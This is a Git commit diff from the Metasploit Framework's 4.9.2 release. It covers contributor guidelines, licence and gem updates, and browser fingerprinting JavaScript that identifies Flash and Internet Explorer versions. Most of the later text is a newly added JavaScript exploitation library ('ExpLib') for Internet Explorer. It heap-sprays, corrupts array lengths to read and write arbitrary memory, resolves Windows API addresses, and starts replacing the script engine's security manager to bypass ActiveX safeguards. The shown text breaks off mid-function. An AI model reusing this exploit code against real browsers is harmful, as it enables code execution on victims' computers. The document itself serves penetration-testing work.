Bump version to 4.9.2

Re-checkout of heartbleed module
Add heartbleed module for release
2014-04-10 17:45:42 -05:00 · 2014-04-09 10:22:14 -05:00 · 2014-04-09 09:53:37 -05:00 · 2014-04-07 18:10:37 -05:00 · 2014-04-07 18:06:59 -05:00 · 2014-04-07 16:13:31 -05:00
1117 changed files with 46350 additions and 15146 deletions
@@ -3,6 +3,9 @@ before_install:
  - rake --version
  - sudo apt-get update -qq
  - sudo apt-get install -qq libpcap-dev
+  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
+  - ls -la ./.git/hooks
+  - ./.git/hooks/post-merge
 before_script:
  - cp config/database.yml.travis config/database.yml
  - bundle exec rake --version
@@ -1,44 +1,70 @@
 # Contributing to Metasploit

-## Reporting Bugs
+Thanks for your interest in making Metasploit -- and therefore, the
+world -- a better place! What you see here in CONTRIBUTING.md is a
+bullet-point list of the do's and don'ts of how to make sure *your*
+valuable contributions actually make it into Metasploit's master branch.

-If you would like to report a bug, please take a look at [our Redmine
-issue
-tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
+If you care not to follow these rules, your contribution **will** be
+closed (*Road House* style). Sorry!

-If your bug is new and you'd like to report it you will need to
-[register
-first](https://dev.metasploit.com/redmine/account/register). Don't
-worry, it's easy and fun and takes about 30 seconds.
+Incidentally, this is a **short** list. The
+[wiki](https://github.com/rapid7/metasploit-framework/wiki) is much more
+exhaustive and reveals many mysteries. If you read nothing else, take a
+look at the standard [development environment setup
+guide](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment)
+and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes).

-When you file a bug report, please include your **steps to reproduce**,
-full copy-pastes of Ruby stack traces, and any relevant details about
-your environment. Without repro steps, your bug will likely be closed.
-With repro steps, your bugs will likely be fixed.
+## Code Contributions

-## Contributing Metasploit Modules
+* **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
+* **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
+* **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.

-If you have an exploit that you'd like to contribute to the Metasploit
-Framework, please familiarize yourself with the
-**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
-document in the
-Metasploit-Framework repository. There are many mysteries revealed in
-HACKING concerning code style and content.
+### Pull Requests

-[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
-should corellate with modules at a 1:1 ratio
-- there is rarely a good reason to have two, three, or ten modules on
-one pull request, as this dramatically increases the review time
-required to land (commit) any of those modules.
+* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
+* **Do** specify a descriptive title to make searching for your pull request easier.
+* **Do** include [console output](https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks), especially for witnessable effects in `msfconsole`.
+* **Do** list [verification steps](https://help.github.com/articles/writing-on-github#task-lists) so your code is testable.
+* **Don't** leave your pull request description blank.
+* **Don't** abandon your pull request. Being responsive helps us land your code faster.

-Pull requests tend to be very collaborative for Metasploit -- do not be
-surprised if your pull request to rapid7/metasploit-framework triggers a
-pull request back to your own fork. In this way, we can isolate working
-changes before landing your PR to the Metasploit master branch.
+Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) and [#3043](https://github.com/rapid7/metasploit-framework/pull/3043) are a couple good examples to follow.

-To save yourself the embarrassment of committing common errors, you will
-want to symlink the `msftidy.rb` utility to your pre-commit hooks by
-running `ln -s ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit`
-from the top-level directory of your metasploit-framework clone. This
-will prevent you from committing modules that raise WARNINGS or ERRORS.
+#### New Modules
+
+* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
+* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
+* **Don't** include more than one module per pull request.
+
+#### Library Code
+
+* **Do** write [RSpec](http://rspec.info/) tests - even the smallest change in library land can thoroughly screw things up.
+* **Do** follow [Better Specs](http://betterspecs.org/) - it's like the style guide for specs.
+* **Do** write [YARD](http://yardoc.org/) documentation - this makes it easier for people to use your code.
+* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
+
+#### Bug Fixes
+
+* **Do** include reproduction steps in the form of verification steps.
+* **Do** include a link to the corresponding [Redmine](https://dev.metasploit.com/redmine/projects/framework) issue in the format of `SeeRM #1234` in your commit description.
+
+## Bug Reports
+
+* **Do** report vulnerabilities in Rapid7 software to security@rapid7.com.
+* **Do** create a Redmine account and report your bug there.
+* **Do** write a detailed description of your bug and use a descriptive title.
+* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
+* **Don't** file duplicate reports - search for your bug before filing a new report.
+* **Don't** report a bug on GitHub. Use [Redmine](https://dev.metasploit.com/redmine/projects/framework) instead.
+
+Redmine issues [#8762](https://dev.metasploit.com/redmine/issues/8762) and [#8764](https://dev.metasploit.com/redmine/issues/8764) are a couple good examples to follow.
+
+If you need some more guidance, talk to the main body of open
+source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)
+or e-mail us at [metasploit-hackers](https://lists.sourceforge.net/lists/listinfo/metasploit-hackers)
+mailing list.
+
+Also, **thank you** for taking the few moments to read this far! You're
+already way ahead of the curve, so keep it up!
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2013, Rapid7 Inc.
+Copyright (C) 2006-2013, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -19,7 +19,7 @@ group :db do
  # Needed for Msf::DbManager
  gem 'activerecord'
  # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.16.9'
+  gem 'metasploit_data_models', '~> 0.17.0'
  # Needed for module caching in Mdm::ModuleDetails
  gem 'pg', '>= 0.11'
 end
@@ -22,7 +22,7 @@ GEM
    fivemat (1.2.1)
    i18n (0.6.5)
    json (1.8.0)
-    metasploit_data_models (0.16.9)
+    metasploit_data_models (0.17.0)
      activerecord (>= 3.2.13)
      activesupport
      pg
@@ -67,7 +67,7 @@ DEPENDENCIES
  factory_girl (>= 4.1.0)
  fivemat (= 1.2.1)
  json
-  metasploit_data_models (~> 0.16.9)
+  metasploit_data_models (~> 0.17.0)
  msgpack
  network_interface (~> 0.0.1)
  nokogiri
@@ -1,146 +1,38 @@
-# $Id$
+HACKING
+=======

-This file contains some brief instructions on contributing to the
-Metasploit Framework.
+(Last updated: 2014-03-04)

-Code Style
-==========
+This document almost entirely deprecated by:

-In order to maintain consistency and readability, we ask that you
-adhere to the following style guidelines:
+CONTRIBUTING.md

- - Standard Ruby two-space soft tabs, not hard tabs.
- - Try to keep your lines under 100 columns (assuming two-space tabs)
- - do; end instead of {} for a block
- - Always use str[0,1] instead of str[0]
-   (This avoids a known ruby 1.8/1.9 incompatibility.)
- - Method names should always be lower_case and words separated by "_"
- - Variable names should be lower case with words separated by "_"
- - Don't depend on any external gems or libraries without talking to
-   todb to resolve packaging and licensing issues 
-
-You can use the the "./tools/msftidy.rb" script to do some rudimentary
-checking for various violations.
-
-
-Code No-Nos
-===========
-
-1. Don't print to standard output. Doing so means that users of
-interfaces other than msfconsole, such as msfrpc and msfgui, won't see
-your output.  You can use print_line to accomplish the same thing as
-puts. 
-
-2. Don't read from standard input, doing so will make your code 
-lock up the entire module when called from other interfaces. If you 
-need user input, you can either register an option or expose an 
-interactive session type specific for the type of exploit.
-
-3. Always use Rex sockets, not ruby sockets.  This includes
-third-party libraries such as Net::Http.  There are several very good
-reasons for this rule.  First, the framework doesn't get notified on
-the creation of ruby sockets and won't know how to clean them up in
-case your module raises an exception without cleaning up after itself.
-Secondly, non-Rex sockets do not know about routes and therefore can't
-be used through a meterpreter tunnel.  Lastly, regular sockets miss
-out on msf's proxy and SSL features.  Msf includes many protocols
-already implemented with Rex and if the protocol you need is missing,
-porting another library to use them is straight-forward.  See our
-Net::SSH modifications in lib/net/ssh/ for an example.
-
-4. When opening an IO stream, always force binary with "b" mode (or
-using IO#binmode). This not only helps keep Windows and non-Windows
-runtime environments consistent with each other, but also guarantees
-that files will be treated as ASCII-8BIT instead of UTF-8.
-
-5. Don't use String#[] for a single character.  This returns a Fixnum in
-ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
-  str[idx,1]
-which always returns a String.  If you need the ASCII byte, unpack it like
-so:
-  tr[idx,1].unpack("C")[0]
-
-6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
-The '<<' operator is significantly faster. The difference will become
-even more apparent when doing string manipulation in a loop. The
-following table approximates the underlying implementation:
-
-        Ruby            Pseudo-C
-        -----------     ----------------
-        a = b + c       a = malloc(b.len+c.len+1);
-                        strcpy(a, b);
-                        memcpy(a+b.len, c, c.len);
-                        a[b.len + c.len] = '\0';
-        a = b           a = b;
-        a << c          a = realloc(a, a.len+c.len+1);
-                        memcpy(a+a.len, c, c.len);
-                        a[a.len + c.len] = '\0';
-
-Note that the original value of 'b' is lost in the second case. Care
-must be taken to duplicate strings that you do not want to modify.
-
-7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
-excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
-for an overview of common and not-so-common Ruby version related gotchas.
-
-8. Never, ever use $global variables. This applies to modules, mixins,
-and libraries. If you need a "global" within a specific class, you can
-use @@class_variables, but most modules should use @instance variables
-to store information between methods.
-
-9. Don't craft your XML document raw or by using Nokogiri, the current
-preferred way is REXML.
-
-Creating New Modules
-====================
-
-When creating a new module, the simplest way to start is to copy
-another module that uses the same protocol and modify it to your
-needs.  If you're creating an exploit module, generally you'll want
-to edit the exploit() method.  Auxiliary Scanner modules use one of
-run_host(), run_range(), or run_batch() instead of exploit().
-Non-scanner aux modules use run().
-
-
-Submitting Your Code
-====================
-
-To get started with a Metasploit Framework source clone, simply:
-
-  - Fork rapid7/metasploit-framework to your GitHub account
-  - git clone git://github.com/YourName/metasploit-framework.git
-  - gem install bundler
-  - bundle install
-
-More detailed documentation regarding the process for submitting new
-modules via GitHub is documented here:
+in the same directory as this file, and to a lesser extent:

+The Metasploit Development Environment
 https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment

-This describes the process of forking, editing, and generating a
-pull request, and is the preferred method for bringing new modules
-and framework enhancements to the attention of the core Metasploit
-development team. Note that this process requires a GitHub account.
+Common Coding Mistakes
+https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes

-For Git commits, please adhere to 50/72 formatting: your commits should
-start with a line 50 characters or less, followed by a blank line,
-followed by one or more lines of explanatory text wrapped at at 72
-characters Pull requests with commits not formatted this way will
-be rejected without review.
+The Ruby Style Guide
+https://github.com/bbatsov/ruby-style-guide

-For modules, note that Author field is not automatic, and should be 
-filled in in the format of 'Your Name <user[at]domain.tld>' so future 
-developers can contact you with any questions.
+Ruby 1.9: What to Expect
+http://slideshow.rubyforge.org/ruby19.html
+
+You can use the the "./tools/msftidy.rb" script against your new and
+changed modules to do some rudimentary checking for various style and
+syntax violations.
+
+Licensing for Your New Content
+==============================

-Licensing
-=========
 By submitting code contributions to the Metasploit Project it is
 assumed that you are offering your code under the Metasploit License
-or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses 
+or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses
 are also fine.  We specifically cannot include GPL code. LGPL code
-is accepted on a case by case basis for libraries only and is never 
+is accepted on a case by case basis for libraries only and is never
 accepted for modules.

-When possible, such as aux and exploit modules, be sure to include
-your license designation in the file in the appropriate place.

@@ -2,19 +2,23 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2013, Rapid7 Inc.
+Copyright: 2006-2014, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
 # at the end of this file.
 #
-# The copyright on this package is held by Rapid7 LLC.
+# The copyright on this package is held by Rapid7, Inc.
 #
 # This license does not apply to third-party components detailed below.
 #
 # Last updated: 2013-Nov-04
 #

+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
+License: BSD-3-clause
+
 Files: data/john/*
 Copyright: 1996-2011 Solar Designer.
 License: GPL-2
@@ -80,7 +84,7 @@ Copyright: 2005-2009, Joel VanderWerf
 License: Ruby

 Files: lib/fastlib.rb
-Copyright: 2011, Rapid7 Inc.
+Copyright: 2011, Rapid7, Inc.
 License: Ruby

 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
@@ -147,6 +151,11 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT
+
+
 #
 # Gems
 #
@@ -167,6 +176,10 @@ Files: arel
 Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
 License: MIT

+Files: bcrypt-ruby
+Copyright: 2007-2011 Coda Hale
+License: MIT
+
 Files: builder
 Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
 License: MIT
@@ -301,7 +314,7 @@ License: BSD-3-clause
     this list of conditions and the following disclaimer in the documentation
     and/or other materials provided with the distribution.
 .
-     * Neither the name of Rapid7 LLC nor the names of its contributors
+     * Neither the name of Rapid7, Inc. nor the names of its contributors
     may be used to endorse or promote products derived from this software
     without specific prior written permission.
 .
@@ -1,6 +1,6 @@
 #!/usr/bin/env ruby

-# Copyright (C) 2008 Metasploit LLC
+# Copyright (C) 2008 Rapid7, Inc.

 #
 # This script extracts the forms from the main page of each
@@ -1,6 +1,6 @@
 #!/usr/bin/env ruby

-# Copyright (C) 2008 Metasploit LLC
+# Copyright (C) 2008 Rapid7, Inc.

 #
 # This script extracts the forms from the main page of each
@@ -0,0 +1 @@
+Any DjVu file can be used this is just a snazzy Metasploit one
@@ -46,6 +46,53 @@ window.misc_addons_detect.hasSilverlight = function () {
 	return found;
 }

+/**
+ * Returns the Adobe Flash version
+**/
+window.misc_addons_detect.getFlashVersion = function () {
+	var foundVersion = null;
+
+	//
+	// Gets the Flash version by using the GetVariable function via ActiveX
+	//
+	try {
+		var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
+		foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
+	} catch (e) {}
+
+	//
+	// This should work fine for most non-IE browsers
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var pluginDesc = mimes[i].enabledPlugin.description.toString();
+			var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
+			if (m != null) {
+				foundVersion = m[0].match(/\d.+/g)[0];
+				break;
+			}
+		}
+	}
+
+	//
+	// Detection for Windows + Firefox
+	//
+	if (foundVersion == null) {
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
+
 /**
 * Returns the Java version
 **/
@@ -184,6 +184,9 @@ window.os_detect.getVersion = function(){
 			} else if (platform.match(/arm/)) {
 				// Android and maemo
 				arch = arch_armle;
+				if (navigator.userAgent.match(/android/i)) {
+					os_flavor = 'Android';
+				}
 			}
 		} else if (platform.match(/windows/)) {
 			os_name = oses_windows;
@@ -193,8 +196,7 @@ window.os_detect.getVersion = function(){
 		if (!ua_version || 0 == ua_version.length) {
 			ua_is_lying = true;
 		}
-	} else if (!document.all && navigator.taintEnabled ||
-	            'MozBlobBuilder' in window) {
+	} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
 		// Use taintEnabled to identify FF since other recent browsers
 		// implement window.getComputedStyle now.  For some reason, checking for
 		// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
@@ -210,7 +212,11 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if (css_is_valid('image-orientation',
+		if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
+			ua_version = '28.0';
+		} else if (css_is_valid('cursor', 'cursor', 'grab')) {
+			ua_version = '27.0';
+		} else if (css_is_valid('image-orientation',
 		                 'imageOrientation',
 		                 '0deg')) {
 			ua_version = '26.0';
@@ -871,12 +877,60 @@ window.os_detect.getVersion = function(){
 				os_flavor = "7";
 				os_sp = "SP1";
 				break;
+			case "9016502":
+				// IE 9.0.8112.16502 / Windows 7 SP1
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+			case "9016506":
+				// IE 9.0.8112.16506 / Windows 7 SP1
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+			case "9016514":
+				// IE 9.0.8112.16514 / Windows 7 SP1
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+			case "9016520":
+				// IE 9.0.8112.16520 / Windows 7 SP1
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+			case "9016526":
+				// IE 9.0.8112.16526 / Windows 7 SP1
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+			case "9016533":
+				// IE 9.0.8112.16533 / Windows 7 SP1
+				ua_version = "9.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
 			case "10016720":
 				// IE 10.0.9200.16721 / Windows 7 SP1
 				ua_version = "10.0";
 				os_flavor = "7";
 				os_sp = "SP1";
 				break;
+			case "11016428":
+				// IE 11.0.9600.16428 / Windows 7 SP1
+				ua_version = "11.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
+			case "10016384":
+				// IE 10.0.9200.16384 / Windows 8 x86
+				ua_version = "10.0";
+				os_flavor = "8";
+				os_sp = "SP0";
+				break;
 			case "1000":
 				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
 				ua_version = "10.0";
@@ -891,14 +945,40 @@ window.os_detect.getVersion = function(){
 		if (!ua_version) {
 			// The ScriptEngine functions failed us, try some object detection
 			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
-				// IE8 detection straight from IEBlog.  Thank you Microsoft.
+				// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
 				try {
-					ua_version = "8.0";
-					document.documentElement.style.display = "table-cell";
-				} catch(e) {
-					// This executes in IE7,
-					// but not IE8, regardless of mode
-					ua_version = "7.0";
+					if (document.__proto__ != undefined) { ua_version = "11.0"; }
+				} catch (e) {}
+
+				// IE 10 detection using nodeName
+				if (!ua_version) {
+					try {
+						var badNode = document.createElement && document.createElement("badname");
+						if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
+					} catch(e) {}
+				}
+
+				// IE 9 detection based on a "Object doesn't support property or method" error
+				if (!ua_version) {
+					try {
+						document.BADNAME();
+					} catch(e) {
+						if (e.message.indexOf("BADNAME") > 0) {
+							ua_version = "9.0";
+						}
+					}
+				}
+
+				// IE8 detection straight from IEBlog.  Thank you Microsoft.
+				if (!ua_version) {
+					try {
+						ua_version = "8.0";
+						document.documentElement.style.display = "table-cell";
+					} catch(e) {
+						// This executes in IE7,
+						// but not IE8, regardless of mode
+						ua_version = "7.0";
+					}
 				}
 			} else if (document.compatMode) {
 				ua_version = "6.0";
@@ -0,0 +1,426 @@
+
+
+ExpLib = (function() {
+
+	function ExpLib( num_arrays, arr_size, base, payload ) {
+		this.arr1 = null;
+		this.arr2 = null;
+		this.base = base;
+		this.arr_size = arr_size;
+		this.arr_arr = null;
+		// Allows to control the contents of the sprayed memory.
+		// Have into account some array positions will be corrupted
+		// while leaking and modifying things.
+		this.arr_contents = [];
+
+		this.payload = payload;
+		this.modules = {}
+		this.getproc = null;
+		this.loadlibrary = null;
+
+		// Offset to the Origin URL in the Stream, modifying it
+		// allows to bypass msado15.SecurityCheck(), allowing
+		// for example to write stream contents to filesystem.
+		this.stream_origin = 0x44;
+	}
+
+	ExpLib.prototype.resolveAPI = function( modulename, procname ) {
+		var module  = this.resolveModule( modulename );
+
+		return this.callAPI( this.getproc, module, this.allocateString(procname) );
+	}
+
+	ExpLib.prototype.resolveModule = function( modulename ) {
+		if ( this.modules[modulename] )
+			return this.modules[modulename];
+
+		var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
+		this.modules[modulename] = module;
+		return module;
+	}
+
+	ExpLib.prototype.spray = function() {
+		this.arr_arr = new Array( num_arrays );
+
+		var decl = "[";
+
+		for ( var i = 0; i < this.arr_size - 1; ++ i ) {
+			decl += '0,';
+		}
+
+		decl += '0';
+		decl += ']';
+
+		for ( var i = 0; i < num_arrays; ++ i ) {
+			this.arr_arr[i] = eval(decl);
+			for(var j = 0; j < this.arr_contents.length; j++) {
+				this.arr_arr[i][j] = this.arr_contents[j];
+			}
+		}
+
+  }
+
+	// Should be used before calling spray()
+	ExpLib.prototype.setArrContents = function(contents) {
+		for(var i = 0; i < this.arr_size && i < contents.length; i++) {
+			this.arr_contents[i] = contents[i];
+		}
+	}
+
+  ExpLib.prototype.setValue = function(i1, i2, v) {
+		this.arr_arr[i1][i2] = v;
+	}
+
+
+  ExpLib.prototype.setValueByAddr = function(index, addr, v) {
+		this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
+	}
+
+	ExpLib.prototype.read32 = function(addr) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( addr >= this.arr2_member_base ) {
+			return this.arr2[(addr - this.arr2_member_base)/4];
+		} else {
+			return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
+		}
+	}
+
+	ExpLib.prototype.write32 = function(addr, value) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( value >= 0x80000000 )
+			value = -(0x100000000 - value);
+
+		//alert(((addr - this.arr2_member_base)/4).toString(16));
+		if ( addr >= this.arr2_member_base ) {
+			this.arr2[(addr - this.arr2_member_base)/4] = value;
+		} else {
+			this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
+		}
+	}
+
+	ExpLib.prototype.read8 = function(addr) {
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xff);
+			case 1: return ((value >> 8) & 0xff);
+			case 2: return ((value >> 16) & 0xff);
+			case 3: return ((value >> 24) & 0xff);
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.write8 = function(addr, value) {
+		var original_value = this.read32( addr  & 0xfffffffc );
+		var new_value;
+
+		switch ( addr % 4 ) {
+			case 0:
+				new_value = (original_value & 0xffffff00) | (value & 0xff);
+				break;
+
+			case 1:
+				new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
+				break;
+			case 2:
+				new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
+				break;
+			case 3:
+				new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
+				break;
+		}
+
+
+		this.write32( addr  & 0xfffffffc, new_value );
+	}
+
+
+	ExpLib.prototype.writeBytes = function(addr, bytes) {
+		for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
+			var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
+						((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
+
+			this.write32( addr + i, value );
+		}
+
+		for ( ; i < bytes.length; ++ i ) {
+			this.write8( addr + i, bytes[i] );
+		}
+	}
+
+	ExpLib.prototype.writeString = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++ i ) {
+			bytes[i] = s.charCodeAt(i);
+		}
+
+		bytes[i] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.writeStringW = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++i ) {
+			bytes[i * 2] = s.charCodeAt(i);
+			bytes[i * 2 + 1] = 0;
+		}
+
+		bytes[s.length * 2] = 0;
+		bytes[s.length * 2 + 1] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.read16 = function(addr) {
+		if ( addr % 2 ) {
+					// error, not aligned
+		}
+
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xffff);
+			case 1: return ((value >> 8) & 0xffff);
+			case 2: return ((value >> 16) & 0xffff);
+			case 3: /*not supported*/ break;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.strequal = function(addr, s)  {
+		for ( var i = 0; i < s.length; ++ i ) {
+			if ( this.read8(addr + i) != s.charCodeAt(i) )
+				return false;
+		}
+
+		return true;
+	}
+
+
+	ExpLib.prototype.getModuleBase = function(addr) {
+
+		var cur_addr = addr;
+
+		while ( cur_addr > 0 ) {
+
+			if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
+				return cur_addr;
+			}
+
+			cur_addr -= 0x10000;
+		}
+
+		return 0;
+	}
+
+
+
+	ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
+		var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
+		var cur_table = import_table;
+
+		while ( cur_table < import_table + 0x1000 ) {
+
+			var name_addr = base + this.read32(cur_table + 12);
+			if ( this.strequal( name_addr, name ) ) {
+				var iat = base + this.read32(cur_table + 16);
+				var func = this.read32(iat);
+				while ( 0 == func ) {
+					iat += 4;
+					func = this.read32(iat);
+				}
+
+				return this.getModuleBase( func & 0xFFFF0000 );
+
+			}
+
+			cur_table += 20;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.getProcAddress = function(base, procname)  {
+		var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
+		var num_functions = this.read32( export_table + 20 );
+		var addr_functions = base + this.read32( export_table + 28 );
+		var addr_names = base + this.read32( export_table + 32 );
+		var addr_ordinals = base + this.read32( export_table + 36 );
+
+		for ( var i = 0; i < num_functions; ++ i ) {
+			var name_addr = this.read32( addr_names + i * 4 ) + base;
+			if ( this.strequal( name_addr, procname ) ) {
+				var ordinal = this.read16( addr_ordinals + i * 2 );
+				var result = this.read32( addr_functions + ordinal * 4 ) + base;
+				return result;
+			}
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.searchBytes = function(pattern, start, end)  {
+
+		if ( start >= end || start + pattern.length > end )
+			return 0;
+
+		var pos = start;
+		while ( pos < end ) {
+			for ( var i = 0; i < pattern.length; ++ i ) {
+				if ( this.read8(pos + i) != pattern[i] )
+					break;
+			}
+
+			if ( i == pattern.length ) {
+				return pos;
+			}
+
+			++ pos;
+		}
+
+		return 0;
+	}
+
+
+	ExpLib.prototype.getError = function(msg) {
+		return this.err_msg;
+	}
+
+	ExpLib.prototype.setError = function(msg) {
+		this.err_msg = msg;
+	}
+
+	ExpLib.prototype.setStreamOrigin = function(offset) {
+		this.stream_origin = offset;
+	}
+
+	ExpLib.prototype.getStreamOrigin = function() {
+		return this.stream_origin;
+	}
+
+	ExpLib.prototype.memcpy = function(dst, src, size) {
+		var i = 0;
+		for ( ; i < size - 4; i += 4 ) {
+			this.write32( dst + i, this.read32(src + i) );
+		}
+
+		for ( ; i < size; ++ i ) {
+			this.write8( dst + i, this.read8(src + i) );
+		}
+	}
+
+	ExpLib.prototype.go = function() {
+
+		var i = 0;
+
+
+
+		for ( ; i < this.arr_arr.length - 1; ++ i ) {
+			this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
+
+			if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
+				this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
+				this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
+
+				this.arr_arr[i + 1].length = 0x3fffffff;
+
+				if ( this.arr_arr[i+1].length == 0x3fffffff ) {
+					break;
+				}
+			}
+
+		}
+
+		if ( i >= this.arr_arr.length - 1 ) {
+			this.setError( "Cannot find array with corrupt length!" );
+			return false;
+		}
+
+		this.arr1_idx = i;
+		this.arr2_idx = i + 1;
+
+		this.arr1 = this.arr_arr[i];
+		this.arr2 = this.arr_arr[i + 1];
+
+		this.arr2_base = this.base + 0x1000;
+		this.arr2_member_base = this.arr2_base + 0x20;
+
+		var func_addr = this.leakAddress(ActiveXObject);
+		var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
+
+		//alert(script_engine_addr.toString(16));
+
+		var original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		if ( !original_securitymanager ) {
+			// let security manager to be valid
+			try {
+				var WshShell = new ActiveXObject("WScript.shell");
+			} catch (e) {}
+
+			original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		}
+
+		var original_securitymanager_vtable = this.read32(original_securitymanager);
+		var securitymanager_size = 0x28;
+		var fake_securitymanager = 0x1a1b2010;
+		var fake_securitymanager_vtable = fake_securitymanager + 0x28;
